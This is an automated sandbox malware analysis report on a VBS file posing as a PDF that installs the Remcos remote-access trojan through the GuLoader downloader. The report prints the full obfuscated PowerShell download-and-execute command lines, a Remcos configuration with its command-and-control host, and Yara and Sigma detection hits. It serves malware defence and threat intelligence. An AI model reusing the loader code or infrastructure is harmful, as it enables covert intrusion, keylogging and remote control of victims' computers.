Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
A 413736796#U00b7pdf.vbs

Overview

General Information

Sample name:A 413736796#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name:A 413736796pdf.vbs
Analysis ID:1523159
MD5:3f5e0a8b0d1ac0143d359bcb63171066
SHA1:7f6368b52a021340768f61ae047d88c7e6d4add3
SHA256:8da5ed79da8da8c5521a238f05bb61bd1e48c59fab0bee7758fc11c163142396
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7656 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7756 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio Fritl PrecTBill ySkr.bpLdreceNavne] rodu: Prpa:Cos.uTPecullBecrisCorre1Pikan2M cac ');$Exaltations=$Seriately[0];$Nongratifying=(Omhng120 'Songo$ AlumgM slyl RidsOStedmBRadioADel.nLOutpe:d skod O diy CaddeChampmMy coawindskPortaiSh ngN ccengSquad=ContaNPal ee BoerwGa,le- askOEtrusbP ppaJ postepursuCOran TBirac Arla sDrayiyt mposNonexTBo igeDruckmDiaki. BetinSlyngeVu.tuTRin e.VakuuwGanjaEOligabTils,cPirusLIntuiiDumdretrichnSkylltEndos ');Stungen ($Nongratifying);Stungen (Omhng120 'Donkr$ Int DPos ty MisteAncismTac.ya CounkFremeiSoftnnSubskgtwa d. iltrHCollieP steaUno edNa.opeumba ranodesRmega[Misto$SarifOMultidGlo,se RondlColomeCharat Medb]Front= List$ .aktATaktat OvertStra.r KlipiGlaurbPiratuOvonit stanvinde r CruodSpot iT.teleHous,rBeta nutense Reag ');$indledningers=Omhng120 'Inter$ .urpD L,ddyUnde eUncoummisdoaPer ek stofi.ebninjesuigG mcr. AlviD umfooDecenw ndsntevanlModneoMa agaKolbedSoldeF HeliiUn.nel Imdee riv( Kont$LektuEMavesx BinaaSkak.lXyloftInteraInjektTv reiMandjoFlippn Forms orag, gi t$SrklaMKrakee c epgBlamaaUnstar IjmaaInsti)psyko ';$Megara=$Istandsttende;Stungen (Omhng120 'Ndtrf$ ouquG tooll rikiOAlmacBOpfriaToothlProd :GefilD Inteo BesiNTyphousoci tBitniSLaman= njoi(gmelitResurEBaandsFlas,t Ildr-otozop AddraB,styt omfrHPeasa Chaws$TrnermBl baEBrideGBeroeaBlyglrAfsteABland)Omfo, ');while (!$Donuts) {Stungen (Omhng120 'Delef$JentrgRiflilKem koColosbUnsu a Schel exah:HvlviDBec siFrontdP ecrySesqunListeaUdfldmSucrai GaveaThion=Udrad$.utoltOmbytrfrogfu.lleseW,yme ') ;Stungen $indledningers;Stungen (Omhng120 'StiffSPreobtColosaLaeotrS tratChiff- UdasSVouchlJews eSepale opplpBinds Abote4Leads ');Stungen (Omhng120 'Hastv$T.ikogOve flL veroJ,nglbDeadwa selelOmgng:Asse DHvneroStemnnMang,uOwnsutLakfasPri,r= U ex(bo igT PacheCiff sOv.rptOldeb-Pa,esP ChiaaUl entU sanhUse e To on$ UnguM VermeGenkog BlodaF,dlar adioaRasor)Obers ') ;Stungen (Omhng120 'Overs$Utakng AllelCl,sso Bu,nbForlaa VedllForha:RevirT ,ouraNonsem Ro deHayag= Med $Telefg WiltlmoutooHetaebel,owaIndf,lmonos: EnerFHandsiSiks lPretrmLun rsDromot summr Derbi EctomPoli mPhotoeOve,nlHuers+Acina+Disbe%Under$,andsS ungeeUnb arReseriAccu.a Gen tunhare fblalSlummyAnt.r.LaramcSmallo SkyduAfskrnSybiltMaves ') ;$Exaltations=$Seriately[$Tame];}$Eksekverbare=282308;$trikstank=31667;Stungen (Omhng120 'C rom$ motigCirculTagryoMiliebForloaG.bbel S pr:NonemJBlacku Eftel orudeAllerm BluneForbis puppsNoveme LrernidiomsWab,t Repe=Akupu .aatGAdelseAandftGen r- maniCInsinoGrnsen EgentL,tbee reennFraflt ndel Unr p$.outiMro aieOpkalgGutsiaPilferKle oa She, ');Stungen (Omhng120 ' ore$Forsvgtmmerl Ens o CarbbPseudaRkkevlBev s:FormaEAspacxS ptopC rkelFriediFj rncFlyn aSunfibSvaeriLokall Nippi roustBlaahyTopsp rind=W shi Retor[ xureSNotoryTil.ys salvtContaeEmanumneote.KefsfCAu tlo.odifnHyn,sv Reole DamprL.gkatNumbb]Skatt:Proec:MetteFF dusrSkitsoChargmInterBBe liaStvnisforfeeCro.k6 egle4 itheSFrosttLatherAmpleiAblatnPrologPalae(Belam$ Au oJDe maustranlGoyineEndotmCommieSeggas ecisMali.e NectnAntics Akti)Besla ');Stungen (Omhng120 'Missu$SubvegfravrlTaksto portb Re saNinetlGalvv:Leg nTFlymehTrapioEnh dmCordiiBrugesD cklt Ac u Uddan=Confi Afpa[ MetaS Ect y Genes.ipsot harie rdomm Stev.Musk,TOmproeSek nx Othatindkr. SecaEAlv onEctrocOrigioErkyndBryoniSneadnVillig ,ntr]Soci :rgneh:StilmABrnepS ynonCP.laeISaracIBetj .SeersGUndereEnwrit pannS Umrktbassar trici otanGamb g over( Coxe$DrapeE Se uxN,nmapCranilFerdyiSleigcKamgaaAdaptb Gappi.aabul Tek iFolket DiacyDisco) Farv ');Stungen (Omhng120 'Samme$CircugTasselVens.oRhi ebS elnaBothilThaum:HvidkoHoggepMolalsMet gt BesktO teaeIndbanGonord StateDem t=Downv$DisemTNaturhUn raoBagr.mPersoiSprkfs Blegt M zz.Hove.sDe,umuanstrbEmbiosJydettOptakrT staiBeslanRsonngP haw( .iva$TanisE R.mpkLymphsHu hjedaakakD shevVrvleeHeracrSubcob So aa A derSamleeParti, apot$Laze.tM diarShoppi Foolk fluisForgat ver aUndernportskD,tal)Echiu ');Stungen $opsttende;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 8088 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio Fritl PrecTBill ySkr.bpLdreceNavne] rodu: Prpa:Cos.uTPecullBecrisCorre1Pikan2M cac ');$Exaltations=$Seriately[0];$Nongratifying=(Omhng120 'Songo$ AlumgM slyl RidsOStedmBRadioADel.nLOutpe:d skod O diy CaddeChampmMy coawindskPortaiSh ngN ccengSquad=ContaNPal ee BoerwGa,le- askOEtrusbP ppaJ postepursuCOran TBirac Arla sDrayiyt mposNonexTBo igeDruckmDiaki. BetinSlyngeVu.tuTRin e.VakuuwGanjaEOligabTils,cPirusLIntuiiDumdretrichnSkylltEndos ');Stungen ($Nongratifying);Stungen (Omhng120 'Donkr$ Int DPos ty MisteAncismTac.ya CounkFremeiSoftnnSubskgtwa d. iltrHCollieP steaUno edNa.opeumba ranodesRmega[Misto$SarifOMultidGlo,se RondlColomeCharat Medb]Front= List$ .aktATaktat OvertStra.r KlipiGlaurbPiratuOvonit stanvinde r CruodSpot iT.teleHous,rBeta nutense Reag ');$indledningers=Omhng120 'Inter$ .urpD L,ddyUnde eUncoummisdoaPer ek stofi.ebninjesuigG mcr. AlviD umfooDecenw ndsntevanlModneoMa agaKolbedSoldeF HeliiUn.nel Imdee riv( Kont$LektuEMavesx BinaaSkak.lXyloftInteraInjektTv reiMandjoFlippn Forms orag, gi t$SrklaMKrakee c epgBlamaaUnstar IjmaaInsti)psyko ';$Megara=$Istandsttende;Stungen (Omhng120 'Ndtrf$ ouquG tooll rikiOAlmacBOpfriaToothlProd :GefilD Inteo BesiNTyphousoci tBitniSLaman= njoi(gmelitResurEBaandsFlas,t Ildr-otozop AddraB,styt omfrHPeasa Chaws$TrnermBl baEBrideGBeroeaBlyglrAfsteABland)Omfo, ');while (!$Donuts) {Stungen (Omhng120 'Delef$JentrgRiflilKem koColosbUnsu a Schel exah:HvlviDBec siFrontdP ecrySesqunListeaUdfldmSucrai GaveaThion=Udrad$.utoltOmbytrfrogfu.lleseW,yme ') ;Stungen $indledningers;Stungen (Omhng120 'StiffSPreobtColosaLaeotrS tratChiff- UdasSVouchlJews eSepale opplpBinds Abote4Leads ');Stungen (Omhng120 'Hastv$T.ikogOve flL veroJ,nglbDeadwa selelOmgng:Asse DHvneroStemnnMang,uOwnsutLakfasPri,r= U ex(bo igT PacheCiff sOv.rptOldeb-Pa,esP ChiaaUl entU sanhUse e To on$ UnguM VermeGenkog BlodaF,dlar adioaRasor)Obers ') ;Stungen (Omhng120 'Overs$Utakng AllelCl,sso Bu,nbForlaa VedllForha:RevirT ,ouraNonsem Ro deHayag= Med $Telefg WiltlmoutooHetaebel,owaIndf,lmonos: EnerFHandsiSiks lPretrmLun rsDromot summr Derbi EctomPoli mPhotoeOve,nlHuers+Acina+Disbe%Under$,andsS ungeeUnb arReseriAccu.a Gen tunhare fblalSlummyAnt.r.LaramcSmallo SkyduAfskrnSybiltMaves ') ;$Exaltations=$Seriately[$Tame];}$Eksekverbare=282308;$trikstank=31667;Stungen (Omhng120 'C rom$ motigCirculTagryoMiliebForloaG.bbel S pr:NonemJBlacku Eftel orudeAllerm BluneForbis puppsNoveme LrernidiomsWab,t Repe=Akupu .aatGAdelseAandftGen r- maniCInsinoGrnsen EgentL,tbee reennFraflt ndel Unr p$.outiMro aieOpkalgGutsiaPilferKle oa She, ');Stungen (Omhng120 ' ore$Forsvgtmmerl Ens o CarbbPseudaRkkevlBev s:FormaEAspacxS ptopC rkelFriediFj rncFlyn aSunfibSvaeriLokall Nippi roustBlaahyTopsp rind=W shi Retor[ xureSNotoryTil.ys salvtContaeEmanumneote.KefsfCAu tlo.odifnHyn,sv Reole DamprL.gkatNumbb]Skatt:Proec:MetteFF dusrSkitsoChargmInterBBe liaStvnisforfeeCro.k6 egle4 itheSFrosttLatherAmpleiAblatnPrologPalae(Belam$ Au oJDe maustranlGoyineEndotmCommieSeggas ecisMali.e NectnAntics Akti)Besla ');Stungen (Omhng120 'Missu$SubvegfravrlTaksto portb Re saNinetlGalvv:Leg nTFlymehTrapioEnh dmCordiiBrugesD cklt Ac u Uddan=Confi Afpa[ MetaS Ect y Genes.ipsot harie rdomm Stev.Musk,TOmproeSek nx Othatindkr. SecaEAlv onEctrocOrigioErkyndBryoniSneadnVillig ,ntr]Soci :rgneh:StilmABrnepS ynonCP.laeISaracIBetj .SeersGUndereEnwrit pannS Umrktbassar trici otanGamb g over( Coxe$DrapeE Se uxN,nmapCranilFerdyiSleigcKamgaaAdaptb Gappi.aabul Tek iFolket DiacyDisco) Farv ');Stungen (Omhng120 'Samme$CircugTasselVens.oRhi ebS elnaBothilThaum:HvidkoHoggepMolalsMet gt BesktO teaeIndbanGonord StateDem t=Downv$DisemTNaturhUn raoBagr.mPersoiSprkfs Blegt M zz.Hove.sDe,umuanstrbEmbiosJydettOptakrT staiBeslanRsonngP haw( .iva$TanisE R.mpkLymphsHu hjedaakakD shevVrvleeHeracrSubcob So aa A derSamleeParti, apot$Laze.tM diarShoppi Foolk fluisForgat ver aUndernportskD,tal)Echiu ');Stungen $opsttende;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 3136 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 4916 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.1924109372.0000000008CF0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000005.00000002.1906272544.000000000611D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000007.00000002.1905132291.0000000009B28000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000005.00000002.1930442779.000000000BDEC000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000002.00000002.1610119241.0000029190071000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 4 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7756.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_8088.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc6d3:$b2: ::FromBase64String(
              • 0xb754:$s1: -join
              • 0x4f00:$s4: +=
              • 0x4fc2:$s4: +=
              • 0x91e9:$s4: +=
              • 0xb306:$s4: +=
              • 0xb5f0:$s4: +=
              • 0xb736:$s4: +=
              • 0x15c71:$s4: +=
              • 0x15cf1:$s4: +=
              • 0x15db7:$s4: +=
              • 0x15e37:$s4: +=
              • 0x1600d:$s4: +=
              • 0x16091:$s4: +=
              • 0xbf79:$e4: Get-WmiObject
              • 0xc168:$e4: Get-Process
              • 0xc1c0:$e4: Start-Process
              • 0x16918:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs", ProcessId: 7656, ProcessName: wscript.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.217.16.206, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3136, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49708
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs", ProcessId: 7656, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc 